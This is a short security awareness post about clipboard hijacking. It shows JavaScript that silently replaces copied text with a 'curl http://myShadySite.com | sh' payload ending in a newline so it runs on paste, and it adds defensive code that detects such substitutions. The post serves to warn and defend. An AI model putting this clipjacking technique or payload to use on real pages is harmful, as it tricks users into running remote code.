Don't Copy Paste into terminal
When you see a shell command on the Internet, do not copy it into your terminal.
Modern JavaScript Clipboard APIs allow a website to overwrite what is added to the clipboard.
Here is an example of how simple this attack can be.
$ echo "looks safe to me!"
Note that you don't even have to press ENTER in your terminal after pasting for the exploit to happen. The payload conveniently contains a trailing newline that does that for you!
Here is the JavaScript that is performing the exploit.
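document.getElementById('copyme').addEventListener('copy', function (e) {
  // Replace the text the user selected with attacker-chosen text.
  // The trailing \n makes the shell run the line as soon as it is pasted.
  e.clipboardData.setData('text/plain',
    'echo "this could have been [curl http://myShadySite.com | sh]"\n'
  );
  // Cancel the default copy so the browser does not overwrite the data set above.
  e.preventDefault();
});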
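A check for the two properties this attack relies on, as an added example that is not code from the original post: the clipboard text differs from what was selected, and it ends in a newline. The function names `inspectPaste` and `toReviewable` are hypothetical, and the sample strings in the comments are the ones shown on this page.

```javascript
// Added example: inspect clipboard text before it reaches a shell.
// Function names are hypothetical, not part of any library.

// Control characters other than tab, CR and LF (includes ESC and DEL).
const CONTROL_CHARS = /[\x00-\x08\x0b-\x1f\x7f]/;

// Compare what was selected on the page with what landed on the clipboard
// and list the properties that make pasting it into a terminal unsafe.
function inspectPaste(visibleText, clipboardText) {
  const findings = [];
  // Ignore a leading "$ " prompt and surrounding whitespace when comparing.
  const normalize = (s) => s.replace(/^\$\s*/, '').trim();
  if (normalize(visibleText) !== normalize(clipboardText)) {
    findings.push('clipboard differs from selected text');
  }
  if (/[\r\n]$/.test(clipboardText)) {
    findings.push('trailing newline: the shell runs the line on paste');
  }
  if (/[\r\n]/.test(clipboardText.replace(/[\r\n]+$/, ''))) {
    findings.push('embedded newline: more than one command');
  }
  if (CONTROL_CHARS.test(clipboardText.replace(/[\r\n]/g, ''))) {
    findings.push('control characters present');
  }
  return findings;
}

// Render the payload inert for review: every control character becomes a
// printable \xNN escape, so nothing executes and nothing stays hidden.
function toReviewable(clipboardText) {
  return clipboardText.replace(/[\x00-\x1f\x7f]/g, (c) =>
    '\\x' + c.charCodeAt(0).toString(16).padStart(2, '0'));
}

// Selected text and clipboard payload from the demo above:
// inspectPaste('$ echo "looks safe to me!"',
//   'echo "this could have been [curl http://myShadySite.com | sh]"\n')
// reports the mismatch and the trailing newline.
```

Pasting into a text editor first gives the same view by hand: the substituted command and its trailing newline are visible before anything runs.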
Sources:
https://briantracy.xyz/writing/copy-paste-shell.html
Cover Image Credit: https://www.pexels.com/@soumil-kumar-4325